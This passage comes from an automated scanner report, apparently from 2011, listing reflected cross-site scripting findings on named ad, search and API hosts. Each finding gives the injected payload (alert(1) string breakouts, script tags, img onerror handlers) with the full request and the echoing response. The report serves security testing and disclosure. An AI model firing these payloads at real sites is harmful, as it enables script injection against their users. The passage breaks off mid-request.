1.53. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155 [UIT parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155

Issue detail

The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2f5e6"-alert(1)-"d81f699c354 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G2f5e6"-alert(1)-"d81f699c354&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:52:59 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1680

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
/ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683579**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G2f5e6"-alert(1)-"d81f699c354&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad">
...[SNIP]...

1.54. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155 [click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4b539"-alert(1)-"67ea36dc1c6 was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!4b539"-alert(1)-"67ea36dc1c6&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:52:40 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1680

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
rc="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683560**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!4b539"-alert(1)-"67ea36dc1c6&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad">
...[SNIP]...

1.55. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7423b"-alert(1)-"cb6a6387cd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad&7423b"-alert(1)-"cb6a6387cd=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:54:10 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1682

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad&7423b"-alert(1)-"cb6a6387cd=1">
...[SNIP]...

1.56. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bf0da"-alert(1)-"8c42b551633 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=ad&ad_size=300x250&entity=58661&site_code=homepage&section_code=&click=http://ad.doubleclick.net/click%3Bh%3Dv8/3aa2/3/0/%2a/n%3B228957569%3B0-0%3B0%3B45421688%3B4307-300/250%3B38375088/38392845/1%3B%3B%7Eaopt%3D2/0/36/0%3B%7Esscs%3D%3f&bf0da"-alert(1)-"8c42b551633=1 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/dmd.ehow/homepage;vid=0;ugc=0;lvl=4;sz=300x250;tile=2;ord=2735259747132?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pc1="b!!!!#!#49P!!!*Z!##wb!+:d(!$9rJ!!H<)!?5%!)I-X?![:Z-!#[Q#!%(/.~~~~~~<ht]%~M.jTN"; BX=90d0t1d6iq2v7&b=3&s=9e; pv1="b!!!!3!#1xy!!E)$!$XwM!+kS,!$els!!mT-!?5%!'2gi6!w1K*!%4=%!$$#u!%_/^~~~~~<jbO@~~!#1y'!!E)$!$XwM!+kS,!$els!!mT-!?5%!'2gi6!w1K*!%4=%!$$#u!%_/^~~~~~<jbO@<l_ss~!#M*E!!E)$!$XwU!/uG1!%:2w!#:m1!?5%!'2gi6!xSD7!%4=%!%@78!'>cr~~~~~<jbOF<ka5`~!#X@7!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@9!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@<!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@>!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#dT5!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT7!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT9!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT<!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#`,W!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,Z!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,]!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,_!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#3yC!!!%G!#4*B!/cr5!%:4s!!!%%!?5%!'k4o6!wVd.!$,gR!$a0[!'>es~~~~~<kI5G<o[wQ~"; uid=uid=b167d032-2d75-11e0-89fa-003048d6d890&_hmacv=1&_salt=2074615246&_keyid=k1&_hmac=249585fedc0ca1193988128dced0dced5912c7fb; ih="b!!!!9!(4vA!!!!#<kc#t!*09R!!!!#<l/M+!*gS^!!!!#<kI:#!+/Wc!!!!#<jbN?!+:d(!!!!#<htX7!+:d=!!!!$<hu%0!+kS,!!!!#<jbO@!->h]!!!!#<htSD!-g#y!!!!#<k:[]!.N)i!!!!#<htgq!.T97!!!!#<k:^)!.`.U!!!!'<kc#o!.tPr!!!!#<k`nL!/9uI!!!!#<k:]D!/H]-!!!!'<hu!d!/J`3!!!!#<jbND!/c)/!!!!#<h67=!/cr5!!!!#<kI5G!/o:O!!!!#<htU#!/poZ!!!!#<iLQk!/uG1!!!!#<jbOF!0>0V!!!!#<l/M."; bh="b!!!#t!!'iQ!!!!#<htUa!!*$n!!!!#<htUa!!,D(!!!!#<kI5F!!-?2!!!!'<kI5F!!-yu!!!!%<hu%6!!.+B!!!!%<hu%:!!0!j!!!!%<kI5F!!0+@!!!!$<jb`/!!04a!!!!$<jb`/!!1CD!!!!#<k2yw!!1Mv!!!!#<hfYB!!1SP!!!!$<ie@u!!2(x!!!!$<kI5F!!4<u!!!!%<kI5F!!4d6!!!!#<jbN=!!5i*!!!!#<himW!!?VS!!ErC<k0fB!!J>N!!!!#<k2yx!!KNF!!ErC<k0fB!!L(*!!!!#<h67=!!L_w!!!!'<kdT!!!Mr(!!ErC<k0fB!!OgU!!!!$<kI5F!!Zwb!!!!#<kI5F!!`Yp!!!!#<htUb!!fP+!!!!#<k`g7!!iEC!!!!#<kI5F!!iEb!!!!%<kI5F!!qOs!!!!#<htUb!!qOt!!!!#<htUb!!qOu!!!!#<htUb!!r-X!!!!#<iMv0!!s6R!!!!#<htUb!!s9!!!!!#<jc#c!!v:e!!!!$<kI5F!!y]X!!!!#<k11E!!ys+!!!!$<h2ED!###_!!!!#<j?lI!##lo!!!!#<jbO@!#$=X!!!!#<gj@R!#')-!!!!#<k2yx!#*VS!!!!#<jLPe!#+]S!!!!$<kI5F!#-B#!!!!#<l.yn!#-vv!!!!$<iC/K!#.dO!!!!'<kdT!!#/yX!!!!#<k2yx!#0$b!!!!%<hu%0!#15#!!ErC<k0fB!#15$!!ErC<k0fB!#1=E!!!!#<kI4S!#2`q!!!!#<jc#g!#3pS!!!!#<jHAu!#3pv!!!!#<jHAu!#5(X!!!!#<jLPe!#5(Y!!!!#<l.yn!#5(`!!!!#<jLPe!#5(b!!!!#<kI3?!#5(f!!!!#<kI4S!#5m!!!!!#<k2yx!#5mH!!!!#<k2yx!#7(x!!!!'<kI5F!#8:i!!!!#<jc#c!#8A2!!!!#<k11E!#:dW!!!!#<gj@R!#<T3!!!!#<jbNC!#I=D!!!!#<kjhR!#K?%!!!!#<l8V)!#Kbb!!!!#<jLP/!#LI/!!!!#<k2yw!#LI0!!!!#<k2yw!#MP0!!!!#<jLPe!#MTC!!!!'<l/M+!#MTF!!!!'<l/M+!#MTH!!!!'<l/M+!#MTI!!!!'<l/M+!#MTJ!!!!'<l/M+!#OC2!!!!#<l/M+!#P<=!!!!#<kQRW!#PrV!!!!#<kQRW!#Q+o!!!!'<kdT!!#Qh8!!!!#<l.yn!#RY.~~!#Ri/!!!!'<kdT!!#Rij!!!!'<kdT!!#SCj!!!!$<kcU!!#SCk!!!!$<kdT!!#SUp!!!!$<kI5F!#SjO!!!!#<gj@R!#SqW!!!!#<gj@R!#T#d!!!!#<k2yx!#TnE!!!!#<l/M+!#U5p!!!!#<gj@R!#UAO!!!!#<k2yx!#UDQ!!!!'<l/M+!#W^8!!!!#<jem(!#X)y!!!!#<jem(!#X]+!!!!'<kdT!!#ZPo!!!!#<ie2`!#ZhT!!!!'<kI5F!#Zmf!!!!$<kT`F!#]!g!!!!#<gj@R!#]Ky!!!!#<gj@R!#]W%~~!#^0$!!!!$<kI5F!#^0%!!!!$<kI5F!#^Bo~~!#_0t!!!!%<kTb(!#`SX!!!!#<gj@R!#aG>!!!!'<kdT!!#aM'!!!!#<kp_p!#av4!!!!#<iLQl!#b<[!!!!#<jHAu!#b<]!!!!#<jLPi!#b<^!!!!#<jHAu!#b<d!!!!#<jLPi!#b<e!!!!#<l.yn!#b<g!!!!#<kI4S!#b<i!!!!#<jLPe!#b<j!!!!#<jHAu!#b<w!!!!#<jHAu!#b=K!!!!#<l.yn!#b?A!!!!#<l.x@!#b](!!!!#<gj@R!#b`>!!!!#<jc#Y!#b`?!!!!#<jc#Y!#b`@!!!!#<jc#Y!#c8D!!!!#<gj@R!#cC!!!!!#<ie2`!#e@W!!!!#<k_2)!#ePa!!!!#<gj@R!#eR5!!!!#<gj@R!#eVe!!!!#<jHAu!#elE!!!!#<k3!!!#f93!!!!#<gj@R!#fBj!!!!%<kI5F!#fBk!!!!%<kI5F!#fBm!!!!%<kI5F!#fBn!!!!%<kI5F!#fBu!!!!#<gj@R!#fG+!!!!%<kI5F!#fJ/!!!!#<gj@R!#fJw!!!!#<gj@R!#fK9!!!!#<gj@R!#fK>!!!!#<gj@R!#fdu!!!!#<k2yx!#fpW!!!!#<l/JY!#fpX!!!!#<l/JY!#fpY!!!!#<l/JY!#g'E!!!!#<gj@R!#g/7!!!!$<kI5F!#g<%!!!!#<gj@R!#gRx!!!!#<htU3!#g[h~~!#g]7!!!!#<l.yn!#g]9!!!!#<kjl4!#h.N!!!!#<kL2n!#jS>!!!!#<k_Jy!#ndJ!!!!#<k2yx!#ndP!!!!#<k2yx!#nda!!!!#<k2yx!#ne$!!!!#<k2yx!#p#b~~!#p]T!!!!$<kL2n"; lifb=%y_Qs7i<Qa5p0/:

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:29:57 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Wed, 02 Feb 2011 15:29:57 GMT
Pragma: no-cache
Content-Length: 4542
Age: 0
Proxy-Connection: close

/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "ad"; rm_url = "http://ad.yieldmanager.com/imp?Z=300x250&bf0da"-alert(1)-"8c42b551633=1&click=http%3a%2f%2fad.doubleclick.net%2fclick%3Bh%3Dv8%2f3aa2%2f3%2f0%2f%2a%2fn%3B228957569%3B0%2d0%3B0%3B45421688%3B4307%2d300%2f250%3B38375088%2f38392845%2f1%3B%3B%7Eaopt%3D2%2f0%2f36%2f0%3B%7Essc
...[SNIP]...

1.57. http://api.bing.com/qsonhs.aspx [&q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bing.com
Path:   /qsonhs.aspx

Issue detail

The value of the &q request parameter is copied into the HTML document as plain text between tags. The payload bdab1<img%20src%3da%20onerror%3dalert(1)>4640eb6d92 was submitted in the &q parameter. This input was echoed as bdab1<img src=a onerror=alert(1)>4640eb6d92 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /qsonhs.aspx?&q=bdab1<img%20src%3da%20onerror%3dalert(1)>4640eb6d92 HTTP/1.1
Accept: */*
Referer: http://www.msn.com/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: api.bing.com
Proxy-Connection: Keep-Alive
Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E&TUID=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c7689f9b6106a4956aba5a571b964d2fe; SRCHD=MS=1621087&D=1593447&AF=NOFORM; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; _UR=OMW=1

Response

HTTP/1.1 200 OK
Content-Length: 78
Content-Type: application/json; charset=utf-8
X-Akamai-TestID: 79e5790adafe4c0ea8f67e06f15299e4
Date: Tue, 01 Feb 2011 15:27:06 GMT
Connection: close

{"AS":{"Query":"bdab1<img src=a onerror=alert(1)>4640eb6d92","FullResults":1}}

1.58. http://api.bizographics.com/v1/profile.json [api_key parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.json

Issue detail

The value of the api_key request parameter is copied into the HTML document as plain text between tags. The payload 4d05c<script>alert(1)</script>0e5436c2494 was submitted in the api_key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.json?api_key=6332f8b7316a4d1284e9c1217a3673474d05c<script>alert(1)</script>0e5436c2494&callback=Demdex.parseBizo HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://fast.dm.demdex.net/dm-dest.html?bizo=1&bizovalidttl=7&
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoID=675ee53a-bc80-4e01-aa24-ca467accf61f; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KbEYt9Gm0axhaj5XcunNcMDa7Re6IGD4lDrbCisip76D66Ad6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa4RXxZnzMYL5lop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtRXq0x1X4kUBB3CBHNXcl3bEVUJBxdqAyDalXCEoKjwKKB7uI3cisSEIeS2mCWkomhIipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Wed, 02 Feb 2011 15:29:30 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 92
Connection: keep-alive

Unknown API key: (6332f8b7316a4d1284e9c1217a3673474d05c<script>alert(1)</script>0e5436c2494)

1.59. http://api.bizographics.com/v1/profile.json [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 33b74<script>alert(1)</script>22bbeb83d65 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.json?api_key=6332f8b7316a4d1284e9c1217a367347&callback=Demdex.parseBizo33b74<script>alert(1)</script>22bbeb83d65 HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://fast.dm.demdex.net/dm-dest.html?bizo=1&bizovalidttl=7&
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoID=675ee53a-bc80-4e01-aa24-ca467accf61f; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KbEYt9Gm0axhaj5XcunNcMDa7Re6IGD4lDrbCisip76D66Ad6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa4RXxZnzMYL5lop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtRXq0x1X4kUBB3CBHNXcl3bEVUJBxdqAyDalXCEoKjwKKB7uI3cisSEIeS2mCWkomhIipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: application/json
Date: Wed, 02 Feb 2011 15:29:36 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=675ee53a-bc80-4e01-aa24-ca467accf61f;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Set-Cookie: BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KTissx4pIKRxvaj5XcunNcMDa7Re6IGD4lOuDZWVHyjN4Ad6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa4RXxZnzMYL5lop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtT8sOM0TiiisRAipIisFvtN4t4VEVUJBxdqAyBAisqZAs2SfkIE4k0isgs29d6PAF0Hy6gC0ipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 206
Connection: keep-alive

Demdex.parseBizo33b74<script>alert(1)</script>22bbeb83d65({"bizographics":{"industry":[{"code":"business_services","name":"Business Services"}],"location":{"code":"texas","name":"USA - Texas"}},"usage":1});

1.60. https://api.bizographics.com/v1/profile.json [api_key parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://api.bizographics.com
Path:   /v1/profile.json

Issue detail

The value of the api_key request parameter is copied into the HTML document as plain text between tags. The payload af475<script>alert(1)</script>5b56c3fcd0c was submitted in the api_key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.json?api_key=6332f8b7316a4d1284e9c1217a367347af475<script>alert(1)</script>5b56c3fcd0c&callback=Demdex.parseBizo HTTP/1.1
Host: api.bizographics.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BizoID=675ee53a-bc80-4e01-aa24-ca467accf61f; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KRShFj6bKbiijaj5XcunNcMDa7Re6IGD4lLFCw41jWbyOAd6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa4RXxZnzMYL5lop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtT8sOM0TiiisRAyMfy5dfAVhDEVUJBxdqAyAsVh4uYPLmIgwbisDgBSipgnUuNumFpPoipAipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie;

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Wed, 02 Feb 2011 16:18:36 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 92
Connection: Close

Unknown API key: (6332f8b7316a4d1284e9c1217a367347af475<script>alert(1)</script>5b56c3fcd0c)

1.61. http://api.blogburst.com/EntityImageHandler.ashx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://api.blogburst.com
Path:   /EntityImageHandler.ashx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload b4387(a)c27091d8173 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /EntityImageHandler.ashxb4387(a)c27091d8173 HTTP/1.1
Host: api.blogburst.com
Accept: */*
Accept-Language: en
